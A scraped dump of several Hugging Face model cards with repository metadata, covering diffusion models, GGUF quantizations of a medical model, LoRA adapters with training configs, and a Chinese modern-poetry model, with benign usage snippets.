--- license: mit language: - en pipeline_tag: text-to-image tags: - pig --- # pig studio model: pig-1k - diffusion model for image generation - compatible with t5xxl text encoder - similar architecture to pixart-α but slightly different - try it out and you will know the difference # pig studio model: pig-1k-aura - diffusion model for image generation - compatible with t5xl text encoder - similar architecture to aura but slightly different - try it out and you will know the difference # pig studio model: pig-1k-sd - diffusion model for image generation - compatible with clip:g-l and t5xxl text encoder - similar architecture to sd but slightly different - try it out and you will know the difference # pig studio model: pig-1k-flux - diffusion model for image generation - compatible with clip-l and t5xxl text encoder - similar architecture to flux but slightly different - try it out and you will know the difference
mradermacher/Diabetica-o1-GGUF
mradermacher
2025-05-30T09:42:24Z
15
0
transformers
[ "transformers", "gguf", "medical", "zho", "eng", "fra", "spa", "por", "deu", "ita", "rus", "jpn", "kor", "vie", "tha", "ara", "base_model:WaltonFuture/Diabetica-o1", "base_model:quantized:WaltonFuture/Diabetica-o1", "license:mit", "endpoints_compatible", "region:us", "conversational" ]
null
2025-03-14T18:37:15Z
--- base_model: WaltonFuture/Diabetica-o1 language: - zho - eng - fra - spa - por - deu - ita - rus - jpn - kor - vie - tha - ara library_name: transformers license: mit quantized_by: mradermacher tags: - medical --- ## About <!-- ### quantize_version: 2 --> <!-- ### output_tensor_quantised: 1 --> <!-- ### convert_type: hf --> <!-- ### vocab_type: --> <!-- ### tags: --> static quants of https://huggingface.co/WaltonFuture/Diabetica-o1 <!-- provided-files --> weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion. ## Usage If you are unsure how to use GGUF files, refer to one of [TheBloke's READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for more details, including on how to concatenate multi-part files. ## Provided Quants (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) | Link | Type | Size/GB | Notes | |:-----|:-----|--------:|:------| | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q2_K.gguf) | Q2_K | 3.1 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q3_K_S.gguf) | Q3_K_S | 3.6 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q3_K_M.gguf) | Q3_K_M | 3.9 | lower quality | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q3_K_L.gguf) | Q3_K_L | 4.2 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.IQ4_XS.gguf) | IQ4_XS | 4.4 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q4_K_S.gguf) | Q4_K_S | 4.6 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q4_K_M.gguf) | Q4_K_M | 4.8 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q5_K_S.gguf) | Q5_K_S | 5.4 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q5_K_M.gguf) | Q5_K_M | 5.5 | | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q6_K.gguf) | Q6_K | 6.4 | very good quality | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.Q8_0.gguf) | Q8_0 | 8.2 | fast, best quality | | [GGUF](https://huggingface.co/mradermacher/Diabetica-o1-GGUF/resolve/main/Diabetica-o1.f16.gguf) | f16 | 15.3 | 16 bpw, overkill | Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png) And here are Artefact2's thoughts on the matter: https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9 ## FAQ / Model Request See https://huggingface.co/mradermacher/model_requests for some answers to questions you might have and/or if you want some other model quantized. ## Thanks I thank my company, [nethype GmbH](https://www.nethype.de/), for letting me use its servers and providing upgrades to my workstation to enable this work in my free time. <!-- end -->
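As a brief, unofficial illustration of the usage note above: one common way to run these quants locally is llama-cpp-python. The file name below is taken from the quant table; everything else (context size, prompt) is an assumption, so adjust as needed.

```python
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

# Download one of the quantized files listed above.
path = hf_hub_download(
    repo_id="mradermacher/Diabetica-o1-GGUF",
    filename="Diabetica-o1.Q4_K_M.gguf",
)

llm = Llama(model_path=path, n_ctx=4096)
out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "Briefly, what does HbA1c measure?"}],
    max_tokens=128,
)
print(out["choices"][0]["message"]["content"])
```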
itsumi-st/imgtikz_llava15_lora
itsumi-st
2025-05-30T09:41:47Z
0
0
peft
[ "peft", "safetensors", "llava_llama", "arxiv:1910.09700", "base_model:deepseek-ai/deepseek-coder-6.7b-instruct", "base_model:adapter:deepseek-ai/deepseek-coder-6.7b-instruct", "region:us" ]
null
2025-05-30T09:39:58Z
--- library_name: peft base_model: deepseek-ai/deepseek-coder-6.7b-instruct --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.10.0
Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9
Varinder2110
2025-05-30T09:39:25Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-05-30T08:34:18Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: TOK --- # 3Cd637E9 6440 4C4B A609 02F979Efeeb9 <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `TOK` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "TOK", "lora_weights": "https://huggingface.co/Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9', weight_name='lora.safetensors') image = pipeline('TOK').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 6000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9/discussions) to add images that show off what you’ve made with this LoRA.
BurgerTruck/mnli-all
BurgerTruck
2025-05-30T09:36:50Z
777
0
transformers
[ "transformers", "safetensors", "bart", "text-classification", "arxiv:1910.09700", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-03-03T09:07:26Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
vermoney/456d65ad-8c97-4337-9868-25d7f6a28e88
vermoney
2025-05-30T09:32:57Z
0
0
peft
[ "peft", "safetensors", "llama", "axolotl", "generated_from_trainer", "base_model:samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9", "base_model:adapter:samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T09:19:42Z
--- library_name: peft base_model: samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9 tags: - axolotl - generated_from_trainer model-index: - name: 456d65ad-8c97-4337-9868-25d7f6a28e88 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9 bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 77e3105900c47af2_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_input: input field_instruction: instruct field_output: output format: '{instruction} {input}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 4 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: vermoney/456d65ad-8c97-4337-9868-25d7f6a28e88 hub_repo: null hub_strategy: end hub_token: null learning_rate: 1.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 64 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 32 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 6 mixed_precision: bf16 mlflow_experiment_name: /tmp/77e3105900c47af2_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 8602e2e9-5dac-48f0-b259-04275ef943bc wandb_project: s56-7 wandb_run: your_name wandb_runid: 8602e2e9-5dac-48f0-b259-04275ef943bc warmup_steps: 50 weight_decay: 0.05 xformers_attention: true ``` </details><br> # 456d65ad-8c97-4337-9868-25d7f6a28e88 This model is a fine-tuned version of [samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9](https://huggingface.co/samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9) on the None dataset. 
It achieves the following results on the evaluation set: - Loss: 1.0225 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-06 - train_batch_size: 6 - eval_batch_size: 6 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 1.7231 | 0.0003 | 1 | 1.0599 | | 1.3692 | 0.0643 | 250 | 1.0309 | | 1.3028 | 0.1285 | 500 | 1.0225 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
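Because this repository is a PEFT LoRA adapter rather than a standalone model, a minimal inference sketch (illustrative only, not part of the original card) would attach the adapter to the base model named above:

```python
# Sketch: load the base model and attach the LoRA adapter with PEFT.
# Repo ids are taken from the card; everything else is illustrative.
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base_id = "samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9"
adapter_id = "vermoney/456d65ad-8c97-4337-9868-25d7f6a28e88"

tokenizer = AutoTokenizer.from_pretrained(base_id)
base = AutoModelForCausalLM.from_pretrained(base_id, device_map="auto")
model = PeftModel.from_pretrained(base, adapter_id)

inputs = tokenizer("Hello, how are you?", return_tensors="pt").to(model.device)
out = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(out[0], skip_special_tokens=True))
```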
Hyaline/Zhima-0.5B
Hyaline
2025-05-30T09:32:42Z
0
0
null
[ "safetensors", "qwen2", "license:apache-2.0", "region:us" ]
null
2025-05-30T07:51:54Z
--- license: apache-2.0 --- # 芝麻 Zhima ## Introduction **Zhima** is an LLM that focuses on Chinese modern poetry creation and can generate original Chinese modern poems based on user instructions using titles, summaries, or keywords. The name Zhima comes from the homophone of Zhimo (Xu Zhimo). Xu Zhimo (1897-1931) was a famous Chinese modern poet. We used [AI-Generated_Chinese_Modern_Poetry](https://huggingface.co/datasets/Hyaline/AI-Generated_Chinese_Modern_Poetry) and [chinese_modern_poetry](https://huggingface.co/datasets/Iess/chinese_modern_poetry) to conduct full-parameter training for 24 hours on 8 A800 GPUs, with [Qwen2.5-0.5B-Instruct](https://huggingface.co/Qwen/Qwen2.5-0.5B-Instruct) as the base model. ## Quick Start ``` pip install transformers ``` ``` from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "Hyaline/Zhima-0.5B" model = AutoModelForCausalLM.from_pretrained( model_name, torch_dtype="auto", device_map="auto" ) tokenizer = AutoTokenizer.from_pretrained(model_name) prompt = "使用以下标题写一首现代诗:向山谷吹来的风" messages = [ {"role": "user", "content": prompt} ] text = tokenizer.apply_chat_template( messages, tokenize=False, add_generation_prompt=True ) model_inputs = tokenizer([text], return_tensors="pt").to(model.device) generated_ids = model.generate( **model_inputs, max_new_tokens=512 ) generated_ids = [ output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids) ] response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0] print(response) ```
Tandogan/dpo_v3_alpaca_on_base_big
Tandogan
2025-05-30T09:31:22Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:30:18Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
teachyouusedicksuck3dayearn1wan/Qwen2.5-3B-GRPO-medical-reasoning-VLLM
teachyouusedicksuck3dayearn1wan
2025-05-30T09:30:08Z
0
0
transformers
[ "transformers", "pytorch", "qwen2", "text-generation", "text-generation-inference", "unsloth", "trl", "conversational", "en", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:27:43Z
--- base_model: unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** teachyouusedicksuck3dayearn1wan - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
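The card does not include a usage snippet; a minimal text-generation sketch with 🤗 Transformers (assuming the repository holds standard Qwen2 causal-LM weights, which the tags suggest) could look like:

```python
# Minimal inference sketch with the Transformers pipeline; the prompt is a made-up example.
from transformers import pipeline

generator = pipeline(
    "text-generation",
    model="teachyouusedicksuck3dayearn1wan/Qwen2.5-3B-GRPO-medical-reasoning-VLLM",
    device_map="auto",
)
messages = [{"role": "user", "content": "Briefly explain what GRPO fine-tuning is."}]
print(generator(messages, max_new_tokens=128, return_full_text=False)[0]["generated_text"])
```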
MaestrAI/camelia_wright-lora-1748597293
MaestrAI
2025-05-30T09:28:15Z
0
0
null
[ "region:us" ]
null
2025-05-30T09:28:14Z
# camelia_wright LoRA Model This is a LoRA model for the character Camelia Wright, created at 2025-05-30 11:28:15.
dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1
dimasik87
2025-05-30T09:24:17Z
0
0
peft
[ "peft", "safetensors", "qwen2", "axolotl", "generated_from_trainer", "base_model:unsloth/Qwen2-1.5B-Instruct", "base_model:adapter:unsloth/Qwen2-1.5B-Instruct", "license:apache-2.0", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T08:25:24Z
--- library_name: peft license: apache-2.0 base_model: unsloth/Qwen2-1.5B-Instruct tags: - axolotl - generated_from_trainer model-index: - name: bee073bf-1eec-4512-b15b-ea5e13c9d7f1 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: unsloth/Qwen2-1.5B-Instruct bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 03542368294c05c0_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_instruction: instruct field_output: output format: '{instruction}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 4 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1 hub_repo: null hub_strategy: end hub_token: null learning_rate: 1.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 64 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 32 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 6 mixed_precision: bf16 mlflow_experiment_name: /tmp/03542368294c05c0_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef wandb_project: s56-7 wandb_run: your_name wandb_runid: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef warmup_steps: 50 weight_decay: 0.05 xformers_attention: true ``` </details><br> # bee073bf-1eec-4512-b15b-ea5e13c9d7f1 This model is a fine-tuned version of [unsloth/Qwen2-1.5B-Instruct](https://huggingface.co/unsloth/Qwen2-1.5B-Instruct) on the None dataset. 
